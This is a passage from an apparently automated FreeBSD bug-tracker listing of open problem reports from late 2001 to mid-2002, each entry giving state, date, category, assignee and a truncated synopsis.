set 128 bit wep key on prism2 (wi0 f [2001/11/21] bin/32175 green ssh-keygen -p core dumps o [2001/11/22] misc/32194 Adaptec SCSI RAID 2100 fails by reboot o [2001/11/22] bin/32205 brian PPP login fails in LCP negotiation on opt o [2001/11/23] kern/32226 time of day clock runs fast (approx twice o [2001/11/23] ports/32234 portmgr Perl ports not $LOCALBASE clean o [2001/11/24] kern/32256 System crash/reboot when deleting file on f [2001/11/24] bin/32261 dump creates a dump file much larger than o [2001/11/26] alpha/32289 alpha memory management fault o [2001/11/26] bin/32295 pthread dont dequeue signals f [2001/11/27] kern/32331 system panic in quotaoff o [2001/11/27] kern/32338 Network to disk write performance low und o [2001/11/28] kern/32353 if kern.maxproc > 512 sybase ASE 11.9.2( o [2001/11/28] gnu/32365 obrien gcc optimiser bug with -O -march=i686 o [2001/11/29] bin/32374 vi -r doesn't work, file contained unexpe o [2001/12/06] kern/32556 sound system crashes when unloading sound modul f [2001/12/07] ports/32589 dirk mod_php4 configure script fails o [2001/12/08] kern/32600 luigi [PATCH] incorrect handling of parent rule o [2001/12/08] bin/32619 des libfetch does not use RFC 1738's definito o [2001/12/08] misc/32631 imp installing 4.4 "mounting root from ufs:/d o [2001/12/09] ports/32663 kde kdelibs2 port potentially conflicts with o [2001/12/10] kern/32668 peter NFS directory removal problems manifested f [2001/12/10] bin/32686 wosch locate command dumps a core file with bro o [2001/12/11] misc/32699 Tulip ether card EN2242 (if_dc.c) use wro o [2001/12/11] ports/32700 assar inode changes for large o [2001/12/11] kern/32716 system hangs when running vid (usb webcam o [2001/12/11] bin/32717 brian ppp(8) change mss to wrong size o [2001/12/12] bin/32759 jmallett [PATCH] make(1) System V include behaviou o [2001/12/12] misc/32760 Please MFC /usr/include/malloc.h to -STAB f [2001/12/12] bin/32791 ru FreeBSD's man(1) utility vulnerable to ol o [2001/12/13] kern/32797 Problem with IPX and netgraph(4) o [2001/12/13] ports/32800 dec gated dies on ppp interface up/down o [2001/12/13] kern/32809 yet another panic while syncing disks aft o [2001/12/14] kern/32827 small SO_RCVTIMEO values are taken to be o [2001/12/14] ports/32844 kde exiting konq term emulator causes crash o [2001/12/21] kern/33074 joe USB printer support does not detect print o [2001/12/21] ports/33080 ume grkrellmvolume interferes with the abilit o [2001/12/21] ports/33082 ports audio/mxv fails to compile o [2001/12/22] kern/33085 jlemon Samba's NMBD cannot find alias interface o [2001/12/22] ports/33093 jdp cvsup SNAP_16_1e breaks by SIGILL during o [2001/12/24] kern/33138 pnp problem in 4.3, 4.4, 4.5 o [2001/12/24] kern/33143 Kernel panic in uhci_abort_xfer_end o [2001/12/24] bin/33155 green [PATCH] sshd can leave hanging processes o [2001/12/26] kern/33201 net/net_osdep.c:if_name is broken f [2001/12/26] misc/33213 ume rarpd fails to init IPv6 enabled interfac o [2001/12/30] kern/33344 memory leak in device resource config loa o [2001/12/30] kern/33346 jhb Kernel panic with SMP kernel o [2001/12/30] kern/33353 panic at odd times...idle, under no load, o [2001/12/30] misc/33370 Post configuration issue o [2002/01/01] ports/33440 portmgr Ports can not resume an interrupted downl o [2002/01/02] kern/33464 dillon soft update inconsistencies after system o [2002/01/03] bin/33515 amd incorrectly handles multi-homed nfs s o [2002/01/03] ports/33519 portmgr make index fails if PERL_VERSION is 5.6.1 o [2002/01/04] kern/33532 sound Playing audio on some soundcards with pcm o [2002/01/04] kern/33535 invalid kernel diagnostic while writing d f [2002/01/04] gnu/33551 cvs chokes on OpenBSD repositories f [2002/01/05] kern/33578 FreeBSD panics when accessing encrypted D o [2002/01/07] kern/33653 DSL PPPoE connection error on 4.5-PRERELE o [2002/01/07] misc/33672 sheldonh telnetd and mount_mfs signal handlers cal p [2002/01/09] misc/33723 select(2) implementation in threaded (-lc o [2002/01/09] kern/33738 argv == NULL is not handled correctly by o [2002/01/13] kern/33833 Correct kernel config for 4.4-RELEASE is o [2002/01/13] kern/33839 joe usb0: host controller halted (involving A o [2002/01/13] ports/33848 ports CUPS doesn't find parallel port o [2002/01/14] bin/33881 adduser additions: selectable crypt schem o [2002/01/15] ports/33927 ports ja-dvipdfm port requires texmf/dvips/base o [2002/01/15] ports/33929 doc Section 15.15 of the FreeBSD Porter's Han o [2002/01/15] ports/33931 mbr trouble installing StarOffice 5.2 over li o [2002/01/16] kern/33940 quotactl allows compromise gid-quotas o [2002/01/16] kern/33974 Can not record anything with emu10k1 on 4 f [2002/01/17] kern/33978 can't kill process o [2002/01/17] i386/33986 sound SMP and audio causes hard lockups (random o [2002/01/17] kern/34017 The siginfo_t passed to the signal handli o [2002/01/18] kern/34020 programs fail that poll(2) on fifos o [2002/01/18] bin/34030 miibus.ko can be loaded into the kernel w o [2002/01/18] kern/34031 hang with linux emulation in 4.5-RC o [2002/01/18] i386/34033 Suspend doesn't work on Dell Latitude CPx o [2002/01/18] ports/34056 ports vmware2 complains of missing file o [2002/01/19] bin/34072 semenu corrupted transfers on mounted ntfs parti f [2002/01/19] misc/34073 3com 3c980c runs "bursty" / freezes-unfre o [2002/01/20] i386/34092 reboot hangs the system (IBM PC Server 31 o [2002/01/21] gnu/34128 sdiff "e" doesn't work with some editors o [2002/01/21] ports/34153 andreas The apsfilter configure script adds bzip2 o [2002/01/23] kern/34205 joe detect USB memory device, But can not use o [2002/01/23] ports/34212 cpiazza Segmentation fault in audio/gmixer o [2002/01/24] kern/34228 Dual processor machine hangs at reboot o [2002/01/24] gnu/34246 joe CVS doesn't rebuild CVSROOT/options o [2002/01/25] kern/34266 SMP does not work on CPQ0579 System board o [2002/01/25] i386/34267 semenu FreeBSD hangs and reboots when overloaded o [2002/01/25] bin/34269 tcpdump -v incorectly identifies packets o [2002/01/25] misc/34270 man -k could be used to execute any comma f [2002/01/26] kern/34306 gibbs 4.5-RC panics on boot with half-supported o [2002/01/29] ports/34409 kuriyama prc-tools from ports fails to compile on f [2002/01/29] i386/34422 crash system wnen kill pppd with reattach o [2002/01/30] misc/34458 green 4.5S/sshd forwarding problems o [2002/01/30] ports/34467 portmgr bsd.port.mk is broken WRT USE_AUTOCONF_VE o [2002/01/31] ports/34480 anholt system hangs after killing xinit o [2002/02/01] i386/34536 accept() blocks other threads o [2002/02/01] bin/34539 [PATCH] fsck(8) doesn't account for negat o [2002/02/01] kern/34544 Kernel crash on fclose() of /dev/kbd1 whe o [2002/02/02] ports/34558 sobomax wxgtk-devel port broken o [2002/02/02] misc/34568 turning printer on and off hangs the comp o [2002/02/03] kern/34582 wpaul Support for D-Link DFE-690TXD Cardbus PC o [2002/02/03] bin/34586 sos burncd -t blank blanks CD o [2002/02/03] i386/34588 read-prefetch on VIA 686B IDE causes hang o [2002/02/04] kern/34619 TCP - FINs with different sequence number o [2002/02/06] kern/34672 imp NEWCARD panic. p [2002/02/06] bin/34682 fenner scanf/sscanf doesn't understand %lld f [2002/02/07] bin/34725 sos burncd cannot write audio file as the 1st o [2002/02/08] ports/34730 lioux new port qmail-scanner - a virus-scanning o [2002/02/09] kern/34764 cisco aironet driver freezes with toshiba o [2002/02/09] kern/34765 darrenr Unloading the ipl.ko module will panic th o [2002/02/10] kern/34801 darrenr TCP window size bug (afflicting IP Filter o [2002/02/10] bin/34811 sh: "jobs" is not pipeable f [2002/02/11] misc/34842 VmWare port + NIS causes "broadcast storm o [2002/02/12] ports/34893 deischen RUS-CERT Advisory 2002-02:01: Temporary f o [2002/02/13] i386/34902 FTP session causes server reboot o [2002/02/13] ports/34907 sf 4.5/ports/ftp/wget+ipv6 hangs top make o [2002/02/16] kern/35004 sound [PATCH] Fix for pcm driver lockups o [2002/02/17] kern/35061 After printing to HP Deskjet 656c USB pri o [2002/02/18] kern/35081 zebra routing problem - kernel bug??? p [2002/02/18] bin/35087 TAR does not recurse directories if it ru o [2002/02/18] misc/35104 Files end up being no bigger than 8192 by o [2002/02/19] misc/35116 keyinfo reports root's keyinfo o [2002/02/20] kern/35136 VLAN & bridging & MTU o [2002/02/20] misc/35145 cannot open /etc/termcap and no terminal o [2002/02/21] ports/35179 kris elm-2.5.5_1: bounce command doesn't work o [2002/02/21] ports/35183 portmgr postgresql-7.1 repo copy request o [2002/02/22] ports/35209 nakai icewm 1.0.9 crashes o [2002/02/22] bin/35214 obrien dump program hangs while exiting o [2002/02/23] ports/35237 ports empty manpage installed by trafcount port o [2002/02/23] kern/35248 panic: ffs_valloc: dup alloc o [2002/02/23] misc/35267 after cvsup src-all for 4.5, /stand/sysin o [2002/02/25] bin/35307 standard include files are not standard c o [2002/02/25] bin/35309 umount -f does not work for ufs floppy o [2002/02/25] misc/35310 SSHing with expired password does not bri o [2002/02/25] ports/35320 znerd linux-jdk-1.4 JVM fails when running Tomc o [2002/02/25] bin/35329 Linking against libc_r.* provokes nasty l o [2002/02/26] misc/35350 Can't boot on ASUS TXP4 o [2002/02/26] kern/35351 emu10k1: no posibility to record sound. K o [2002/02/26] ports/35353 green cfs strips eighth bit of file name on "ou o [2002/02/26] ports/35364 ports cdb port forgets uint32.h f [2002/02/27] ports/35386 ports doxygen port will not configure o [2002/02/27] kern/35396 poll(2) doesn't set POLLERR for failed co o [2002/02/28] kern/35399 poll(2) botches revents on dropped socket o [2002/02/28] kern/35425 System hang while boot on specific SMP mo o [2002/02/28] kern/35429 select(2)/poll(2)/kevent(2) can't/don't n o [2002/02/28] kern/35442 Problem transmitting runts in if_sis driv o [2002/03/01] alpha/35455 alpha Unable to compile ISA NIC devices into ke o [2002/03/01] kern/35461 trap 12 when booting with Maxtor 160G dis o [2002/03/02] kern/35482 dc driver uses wrong case to read MAC fro o [2002/03/03] misc/35506 innetgr() doesn't match wildcard fields i o [2002/03/03] kern/35511 sis(4) multicast filtering doesn't pass s o [2002/03/03] ports/35515 steve open-motif-2.1.30_2 installation deletes o [2002/03/03] ports/35517 portmgr New port: MySQL 4.0 f [2002/03/05] ports/35570 ports aureal-kmod ports has invalid Makefile o [2002/03/05] ports/35579 ports New port: phpsysinfo o [2002/03/06] docs/35620 doc make release fails in documentation for R o [2002/03/07] bin/35622 sigaltstack is missing in libc_r o [2002/03/07] ports/35631 ports SKIP and IPSEC together cause kernel pani o [2002/03/07] kern/35645 Layer 2 switching using default router of o [2002/03/07] misc/35662 send-pr and/or web pr query system screws o [2002/03/08] kern/35669 NFSROOT breaks without a gateway o [2002/03/08] docs/35678 doc docproj Makefiles for web are broken for o [2002/03/08] kern/35691 Realtek NIC driver does not work with Rea o [2002/03/09] kern/35703 /proc/curproc/file returns unknown o [2002/03/10] i386/35742 USB 2.0 attached device cannot be fdisk'd o [2002/03/10] kern/35756 USB reattach of Sony DSC-S75 fails, USB s o [2002/03/11] misc/35774 [SECURITY] Suboptimal auditing possibilit o [2002/03/11] ports/35777 des www/linux-opera does not install with lin f [2002/03/11] ports/35780 ports Update port: russian/fortuneru o [2002/03/12] alpha/35815 alpha Can't install 4.5 for Alpha from the 4.5- o [2002/03/12] bin/35842 rm -f nonexistent file successful but rm o [2002/03/13] bin/35843 maxim [PATCH] MD5 auth implemented in routed is o [2002/03/13] kern/35873 recent -STABLE dhclient doesn't see wirel o [2002/03/13] gnu/35878 /usr/bin/strip resets ABI type to FreeBSD o [2002/03/13] conf/35880 rc files could be a bit more jail friendl o [2002/03/14] kern/35887 ipfw(8) limit feature does not work prope a [2002/03/15] bin/35921 jon Wrong path reduction of dot-dot paths in o [2002/03/15] misc/35924 signal.h does not check for _POSIX_REALTI o [2002/03/15] bin/35925 fixit floppy cannot be mounted on USB dri a [2002/03/16] kern/35985 re swap double mount o [2002/03/16] kern/35986 Wrong bpf-header preceading packet when u o [2002/03/16] kern/35989 720KB floppies unusable o [2002/03/17] i386/36003 Cyclades Cyclom YeP causes panics on Free o [2002/03/17] kern/36038 bp sendfile(2) on smbfs fails, exposes kerne f [2002/03/18] kern/36056 atapicd driver won't boot with cdr-cdroms o [2002/03/18] kern/36057 atacontrol, apm, kernel panic o [2002/03/19] misc/36086 Kerberos Problem/Handbook wrong/Followup o [2002/03/19] ports/36123 portmgr seemingly bogus run-time dependency on mk f [2002/03/20] ports/36144 ports New port: pinepgp-0.17.3 o [2002/03/20] kern/36147 bogus irq 7 message being issued o [2002/03/21] kern/36160 Kernel halts while trying to detect CD-C6 o [2002/03/21] bin/36167 _THREAD_SAFE & _REENTRANT used inconsiste o [2002/03/21] docs/36168 doc -pthread/_THREAD_SAFE docs missing in gcc o [2002/03/21] bin/36175 billf Vsnprintf causes memeory leak o [2002/03/22] kern/36204 cannot install -STABLE from CD-ROM Drive o [2002/03/22] kern/36209 read() system call never returns in some o [2002/03/22] kern/36219 poll() behaves erratic on BPF file descri o [2002/03/22] kern/36220 panic: sched_sync: fsync failded vp 0xcf4 o [2002/03/23] ports/36237 portmgr registering _real_ dependencies in bsd.po o [2002/03/25] kern/36300 acd0c: 'device not configured ' after sta o [2002/03/25] ports/36303 dirk Apache with mod_php4 wont run if mod_php4 o [2002/03/25] kern/36315 panic: vm_fault on nofault entry while ru o [2002/03/26] kern/36329 reference of unexistent object f [2002/03/26] ports/36363 ports apache13-ssl - default'httpsd.conf' lack o [2002/03/27] ports/36411 glewis java/jdk13 not owner/group safe o [2002/03/28] kern/36413 the bktr driver tries to destroy device a o [2002/03/28] kern/36415 the bktr driver incorrectly handles the s a [2002/03/28] i386/36451 roger (sys/dev/bktr) Japan IF frequency is inco s [2002/03/29] bin/36473 ru Overdue MFC's in chmod/chown/chflags o [2002/03/29] kern/36482 Multiport starfire card (sf/ukphy) doesn' o [2002/03/29] ports/36484 sobomax Windowmaker 0.80.0 should be marked with o [2002/03/29] conf/36508 installation floppy bug (See description) s [2002/03/29] ports/36516 dwcjr MAINTAINER UPDATE: delete print/texinfo, o [2002/03/29] i386/36517 sis driver can't map ports/memory for Net o [2002/03/29] kern/36522 stat outside procs in procfs succeeds fro o [2002/03/29] ports/36526 nakai xfce help file images not shown o [2002/03/30] ports/36554 netchild ports/lang/icc requires linux_devtools to o [2002/03/31] ports/36565 anholt x11/XFree86-4-libraries doesn't install e o [2002/03/31] kern/36566 System reboot with dead smb mount and umo o [2002/03/31] kern/36603 X crashes o [2002/03/31] kern/36605 [PATCH] vm_zone: zinitna failure leaves z o [2002/04/01] kern/36610 acd0: MODE_SENSE_BIG command timeout - re o [2002/04/01] docs/36642 doc 4.5 man page on ipfw new option limit is o [2002/04/01] i386/36647 There is no suitable driver for SURECOM E o [2002/04/03] kern/36708 panic: ufs_dirbad: bad dir during pkg_inf o [2002/04/03] ports/36711 ports Configure Bug: cyrus-sasl-1.5.27_2 / krb o [2002/04/03] i386/36718 install boot before sysinstall halts ata1 o [2002/04/04] i386/36761 Symbol problems dependant on boot method, s [2002/04/04] ports/36772 dinoex smtpd incompatible with newest sendmail o [2002/04/05] kern/36784 Can't fcntl(fd, F_SETFL, ...) on a pseudo o [2002/04/05] kern/36790 kernel panic in biodone() on boot p [2002/04/05] ports/36804 ports portupgrade of apache13+modssl causes cer o [2002/04/06] ports/36811 anholt XFree86-4-libraries cannot find version.d o [2002/04/06] kern/36813 arr un-bzero'd sin_zero causes bind() in PF_I o [2002/04/06] ports/36819 anholt /usr/ports/x11/XFree86-4 compilation trou s [2002/04/06] ports/36826 alane x11-servers/XFree86-4-Server: xf86cfg -te o [2002/04/07] ports/36838 scrappy MICO update to 2.3.7 o [2002/04/07] ports/36843 nik auth_ldap port fix o [2002/04/07] ports/36846 ports fxtv 1.03 freezes the system when $LANG=d o [2002/04/07] kern/36858 The USB flash drive "Apacer HandyDrive" c o [2002/04/07] bin/36867 johan games/fortune: add FORTUNE_PATH env var, o [2002/04/08] kern/36876 sos Weird read-errors while accessing data fr o [2002/04/08] ports/36879 ports emulators/vmware2 freezes and reboots sys o [2002/04/08] conf/36911 installation floppies miss autoload file o [2002/04/09] bin/36926 send-pr destroys PR if emacs interrupt ch o [2002/04/09] i386/36943 reboot hangs on Tyan Thunder K7 with SMP o [2002/04/09] kern/36953 des linux emulation does not work well on SMP f [2002/04/09] ports/36954 ports PostgreSQL daylight savings fix... o [2002/04/11] i386/36991 Installing gnome from packages over the n o [2002/04/11] misc/36999 2 Default Routes Created f [2002/04/11] ports/37005 vanilla Broken build of /usr/ports/graphics/gimp1 o [2002/04/11] ports/37006 dirk cdrecord does not work with Teac USB CDRW o [2002/04/12] ports/37026 dinoex FBSD4.5/4.4 sshd coredump, for unexisting o [2002/04/12] docs/37029 doc The translation in Italian language of th o [2002/04/13] kern/37035 [PATCH] msdosfs_readdir() freezes after f o [2002/04/13] kern/37043 Latest stable causes SCSI bus freeze on s o [2002/04/14] kern/37057 Problem with rlimits on filesystem mounte o [2002/04/14] ports/37085 andreas apsfilter/ghostscript don't work with hpi o [2002/04/15] kern/37109 Kernel refuses to assign unused IP to tun f [2002/04/16] ports/37142 dirk [Patch] devel/pth (use libtool and load s o [2002/04/16] bin/37159 ru more then one natd use running use the sa o [2002/04/16] ports/37165 dirk port print/lyx does not build on 4-STABLE o [2002/04/16] kern/37171 smbfs non-functional in -STABLE o [2002/04/17] ports/37180 dirk [New Port] php-dev (apache 1.3 / 2.0 modu o [2002/04/18] ports/37223 sobomax devel/sdl12 1.2.4 broken (includes patch o [2002/04/18] bin/37224 make: $< only set for implicit rules o [2002/04/18] ports/37236 obrien bash1 port broken? o [2002/04/18] i386/37240 EtherExpress16 not probed at boot o [2002/04/19] i386/37243 dvd rom - ata0-slave: identify retries ex o [2002/04/19] ports/37251 portmgr ports seem to have to hardwire numeric us o [2002/04/19] kern/37261 luigi kernel is not linking without "device eth o [2002/04/19] ports/37262 ports gphoto2 fails to find supported USB digit o [2002/04/19] kern/37270 jeff nullfs broken by locking changes in -curr o [2002/04/20] alpha/37295 alpha Make Install of KDE2 fails on alpha o [2002/04/21] ports/37309 anholt XFree86-4 port (XFree86 4.2) doesn't comp o [2002/04/21] kern/37311 latent bug: kernel crash in -stable, same f [2002/04/21] ports/37319 ports [Patch] textproc/pspell-ispell (Makefile o [2002/04/21] kern/37326 smbus/bktr crash when omitting "device ii o [2002/04/21] kern/37332 scsi PATCH: add pen device to scsi_da.c o [2002/04/22] bin/37343 portmap TCP binds strangeness o [2002/04/22] ports/37358 ports xawtv generates sigalrm with bktr o [2002/04/22] ports/37361 sobomax installing gcc30 port breaks devel/gettex o [2002/04/23] alpha/37382 alpha de0 (tulip) DEC-21140A card stays in OACT o [2002/04/23] alpha/37385 alpha xl0 network card (509B) fails on heavy tr o [2002/04/23] misc/37399 rsh does not work from Win 2k to freeBSD o [2002/04/23] ports/37400 nakai The cosmo game contains unchecked buffers o [2002/04/24] i386/37420 Copying large files from an IDE CD-ROM to o [2002/04/24] kern/37436 accept dead loop when out of file descrip o [2002/04/24] kern/37441 ISA PNP parse problem o [2002/04/24] kern/37443 incorrect move pointer in environment str o [2002/04/25] bin/37468 ports mpeg_play compiled on current/DP1 does no o [2002/04/26] i386/37482 Weird behaviour under relatively slow loa o [2002/04/26] bin/37495 /stand/sysinstall coredumps during packag o [2002/04/27] kern/37502 NFS client ignores mtime.tv_usec for open o [2002/04/28] i386/37523 lock for bios16 call and vm86call o [2002/04/28] ports/37537 ports trafcount causes reboot at 3AM every nigh o [2002/04/29] kern/37573 luigi kernel crashes when changing dummynet pip o [2002/04/29] misc/37585 System hangs on install at probing device o [2002/04/30] misc/37586 newfs failing in 5.0-DP1 initial install o [2002/04/30] kern/37589 Kernel panics upon resume from zzz on my o [2002/04/30] ports/37612 ports [New Port] PHP Development version o [2002/05/14] kern/38095 bp vlan not supported with fxp o [2002/05/15] ports/38110 ports NEW PORT: games/wmpuzzle for WindowMaker/ o [2002/05/16] kern/38139 no carrier after kernel rebuild o [2002/05/16] i386/38151 Installation of 5.0DP1 panics very early o [2002/05/16] kern/38166 ipv6_gateway_enable="YES" breaks lpd o [2002/05/17] ports/38172 keith ports/chinese/ghostscript6 o [2002/05/17] ports/38182 dirk php 4.2.1 port fails during make o [2002/05/17] kern/38210 SIOCGIFCONF truncates interface list. o [2002/05/17] ports/38212 knu XFree86-4 and portupgrade get dependencie o [2002/05/18] misc/38241 mount_cd9660 doesn't mount/read multisess o [2002/05/20] kern/38333 ATA drives only UDMA33 after APM standby o [2002/05/21] misc/38373 ipfw-graph reboots compaq 5500r o [2002/05/21] bin/38374 [patch] crontab environment variable pars o [2002/05/21] ports/38375 dirk The port lang./php4 can't be used as CGI o [2002/05/22] kern/38438 System crashes when starting XFree4 o [2002/05/23] misc/38460 ports core dumps with ghostscript o [2002/05/24] kern/38495 soreceive fails to maintain invariant on o [2002/05/24] kern/38527 /dev/random does not obey O_NONBLOCK flag o [2002/05/25] kern/38549 the procces compiled whith pthread stoppe o [2002/05/25] kern/38554 changing interface ipaddress doesn't seem o [2002/05/25] ports/38560 cpiazza PATCH: audio/gmixer uses uninitialized po o [2002/05/25] kern/38562 bridge_cfg=*dc0* ; kldload if_dc => panic o [2002/05/26] misc/38582 qa sysinstall sets newfs flag after changing o [2002/05/26] ports/38587 kuriyama bug in snmpd v5.0.1 in freebsd systems o [2002/05/26] ports/38590 anholt XFree86 4.2 driver module cirrus_alpine.o o [2002/05/27] ports/38602 gpalmer x11-wm/tvtwm is confused about PREFIX o [2002/05/27] bin/38609 qa Sysinstall should know the size of the va o [2002/05/27] misc/38629 X window size too big for screen, how do o [2002/05/27] kern/38632 Loss of connection with wi cards o [2002/05/29] ports/38681 nectar pam_krb5-1.0.3 configure fails to determi p [2002/05/29] i386/38703 iedowse disklabel initializes fragment size to be o [2002/05/30] i386/38731 Freebsd doesn't support ( pdc20276 / Raid o [2002/05/30] kern/38736 kernel panic during memory stick removal o [2002/05/30] ports/38744 ports net/openldap2 doesn't work if db3 and db4 o [2002/05/30] kern/38752 rn_walktree_from not halting at the right o [2002/05/31] kern/38763 GENERIC kernel doesn't boot o [2002/05/31] kern/38764 Maxtor 30GB USB-2.0 drive needs quirk ent o [2002/05/31] bin/38765 CVS Daemon Vulnerability in 1.11.1p1 o [2002/05/31] ports/38770 obrien gcc 3.0.4 fails to build o [2002/05/31] bin/38778 dhclient infinite loop on ro /etc/resolv. o [2002/06/01] kern/38794 ESS Solo driver truncates output o [2002/06/01] kern/38795 kldunload of snd_ess, snd_sb16, snd_sb8 p o [2002/06/01] ports/38801 ports sasl_apop_patch.gz breaks LOGIN mech (SMT o [2002/06/02] misc/38835 sysinstall always installs crypto o [2002/06/03] ports/38859 portmgr lang/gnat-doc-info: fix install o [2002/06/03] kern/38864 -CURRENT: buildkernel stop in vnode_if.h o [2002/06/04] kern/38883 'kldload bktr' stuck in state swwrt, exer o [2002/06/04] kern/38894 Dell PowerEdge 4600 PCI Bus scan problems o [2002/06/04] kern/38906 calcru: negative time of o [2002/06/05] bin/38918 edquota breaks silently when quota-marked o [2002/06/05] ports/38933 portmgr New Port: games/lbreakout2 o [2002/06/06] bin/38963 Unable to newfs vinum volumes o [2002/06/07] kern/38983 Kernel fails to access disk a [2002/06/07] ports/39010 ports libwmf fails to portinstall o [2002/06/10] ports/39091 ports mv *-config to libdir to coexist with apr o [2002/06/10] misc/39104 The disc in your drive looks more like an o [2002/06/10] ports/39107 portmgr _REENTRANT not defined in PTHREAD_CFLAGS o [2002/06/10] kern/39109 m_cat() does not update m_pkthdr.len o [2002/06/11] kern/39141 silby Broken PTMUD o [2002/06/11] ports/39148 cy screen consumes 100% when run o [2002/06/11] ports/39149 ports ports/mail/cyrus-imapd: cyradm causes per o [2002/06/11] ports/39151 dima acroread4 install fails o [2002/06/11] kern/39185 core dump binary in single user mode o [2002/06/12] conf/39196 src-crypto collection should be splitted o [2002/06/12] kern/39199 CASIO QV-4000 not recognized by /sys/dev/ o [2002/06/12] ports/39205 ports Patch to add nmh package files so EXMH re o [2002/06/13] kern/39233 NonConforming IPsec implementation from F o [2002/06/13] kern/39235 not writing correct data to TI1420 PCCARD o [2002/06/13] kern/39252 Syscons doesn't support 8-bit control cha o [2002/06/13] ports/39254 ports Insecure mode on scripts in the icradius o [2002/06/13] kern/39260 pcm0 locks on boot, Compaq Presario 1920 o [2002/06/14] bin/39296 sos burncd fails in dao mode o [2002/06/15] kern/39322 sos Strange detection of IDE CDROM o [2002/06/15] kern/39329 '..' at mountpoint is subject to the perm o [2002/06/15] kern/39331 dwmalone namei cache unreliable for __getcwd() o [2002/06/15] ports/39332 ports coldsync build broken on current p [2002/06/15] conf/39351 dougb /etc/rc.syscons is always ran - even if t f [2002/06/15] misc/39354 where is the Brazilian portuguese locale? o [2002/06/16] kern/39369 "pseudo-device sppp" requires net/slcompr o [2002/06/16] ports/39378 anholt XFree86-4-libraries fails to install with o [2002/06/16] kern/39388 groudier ncr/sym drivers fail with 53c810 and more a [2002/06/16] kern/39396 cjc firewall security loophole p [2002/06/17] standards/39408ache FreeBSD use wrong collate table for pl_PL o [2002/06/17] ports/39441 ports x11-wm/afterstep &afterstep-i18n install/ o [2002/06/17] kern/39447 4.5R &4.6R Kernels fail to boot w/ AHA294 o [2002/06/17] kern/39449 sos wierd ata status o [2002/06/18] bin/39478 des `ssh-keygen -p -t rsa' causes segfault o [2002/06/18] ports/39479 cy Binary version of screen-3.9.11_1 in port f [2002/06/19] kern/39499 sos sysinstall panic with ATAPI CD-ROM o [2002/06/19] kern/39502 can't write on smbfs with scp o [2002/06/19] i386/39507 FreeBSD can't boot: BTX halted problem o [2002/06/19] i386/39536 FreeBSD default bootloader does not load o [2002/06/19] kern/39556 [PATCH] lio_listio(2) is broken. o [2002/06/20] i386/39604 Install failure on HP Pavilion 310n - Una o [2002/06/21] ports/39623 ports [New Ports] Development versions of PHP, o [2002/06/21] i386/39633 Errors reported in schistory.c in syscons o [2002/06/21] ports/39646 portmgr [PATCH] to fix broken _MLINKS o [2002/06/22] ports/39659 portmgr add (DOCS|EXAMPLES|DATA)DIR to PLIST_SUB o [2002/06/22] ports/39660 portmgr add ${PKGNAMEPREFIX} to (DOCS|EXAMPLES)DI o [2002/06/22] ports/39661 sobomax freetype2 fails trying to apply patch pat o [2002/06/22] ports/39662 portmgr add default MAN3PREFIX for perl ports o [2002/06/22] bin/39671 mknetid segfaults on default /etc/master o [2002/06/23] ports/39689 obrien mail/mutt patch-1.4.rr.compressed.1.gz mi o [2002/06/23] bin/39741 dwmalone usr.sbin/pw/pw_user.c:726: warning: int f o [2002/06/23] ports/39760 jedgar ports/math/rcalc is too old and contains o [2002/06/24] conf/39763 Can't get a correct MAC address for MELCO o [2002/06/24] misc/39765 bsd.incs.mk, INCDIR or INCSDIR ? o [2002/06/24] ports/39775 ports p5-GD has erroneous dependency on X11 and o [2002/06/24] ports/39784 ports NEW PORT: games/marbles, a challenging pu o [2002/06/24] ports/39788 mharo building proftpd in ports ignores WITH_MY o [2002/06/24] i386/39802 iBCS2 emulation fork process core dumps o [2002/06/24] kern/39805 4.6R install panics with umass0 device co o [2002/06/24] kern/39813 program hangs in atprq state permanently o [2002/06/24] ports/39820 nbm Port Update mail/sqwebmail to 3.3.5 o [2002/06/24] ports/39827 ports Copying files using Windows Explorer unde o [2002/06/25] bin/39849 /sbin/restore fails to overwrite files wi o [2002/06/25] ports/39853 obrien ftp/ncftp3 is broken on 64-bit archs o [2002/06/25] ports/39859 nbm ports/www/publicfile confused file name i o [2002/06/25] ports/39860 ports Crystal Space port doesn't build o [2002/06/25] ports/39863 ports sysutils/LPRng has incomplete pkg-plist [ f [2002/06/26] ports/39877 kde qt23 in release 4.6 does not compile o [2002/06/26] kern/39878 mysqld process suddenly runs at 99% CPU w f [2002/06/26] ports/39884 lioux avifile-0.7.7.20020523 can not compile f [2002/06/26] conf/39887 matusita /stand/sysinstall doesn't set sendmail_en o [2002/06/26] bin/39896 netmask 0xffffff00 no longer works in /et o [2002/06/26] bin/39906 cleaning sbin/newfs code from warnings o [2002/06/27] bin/39918 Userland PPP - CHAP and PAP are swaped o [2002/06/27] bin/39922 [PATCH?] Threaded applications executed w o [2002/06/27] kern/39928 wi0 timeouts and hangs the system while s o [2002/06/27] kern/39937 ipstealth issue o [2002/06/27] bin/39940 /usr/sbin/periodic sends thousands of ema o [2002/06/27] kern/39942 4.6-current does not play well with DG Av o [2002/06/27] ports/39943 dirk ports/www/mod_php4 build failure o [2002/06/28] kern/39960 imp wi driver can cause system crash when try o [2002/06/28] kern/39961 imp diff on if_wi.c f [2002/06/29] bin/39995 users not in @wheel cannot change their p o [2002/06/29] ports/39997 ports e2fsprogs needs mk_cmds o [2002/06/29] misc/40001 vinum showing -2 drives after removing se o [2002/06/29] kern/40023 pccard initialization & reset errors (fix o [2002/06/30] kern/40044 SMP kernel fails to boot on DELL 610 o [2002/07/01] i386/40073 Xircom Realport Ether doesn't work in Tos o [2002/07/01] ports/40088 ports Update: www/webcheck (patches deleted) o [2002/07/02] ports/40112 obrien mail/mutt: fix path for ${PREFIX}/share/d o [2002/07/02] misc/40119 will not read the cd when bsd is planning o [2002/07/02] kern/40122 Device pcm stopps booting Kernel 4.6 o [2002/07/02] ports/40123 anholt unable to build XFree86-Server-4.2.0_3 o [2002/07/02] misc/40126 dougb bind8 port puts nslookup in the wrong pla o [2002/07/02] i386/40132 Enabling the joystick interface on es137x o [2002/07/03] kern/40139 darrenr ipfilter issue o [2002/07/03] ports/40166 obrien editors/vim: distinfo not updated, Makefi o [2002/07/03] ports/40167 bp mars_nwe does not report disk full errors o [2002/07/03] ports/40168 ports NEW PORT: NotFTP, a WWW-HTTP gateway writ o [2002/07/04] kern/40176 panic: lockmgr: locking against myself -- p [2002/07/04] bin/40177 maxim /bin/sh with builtin 'test' has memory le o [2002/07/04] kern/40185 FreeBSD does not work with the nVidia nFo o [2002/07/04] ports/40189 anholt XFree86 4.2 doesn't support bg_BG.CP1251 o [2002/07/04] kern/40193 PCI devices can not be used with an nVidi o [2002/07/04] misc/40206 Can not assign alias to any POINTOPOINT i o 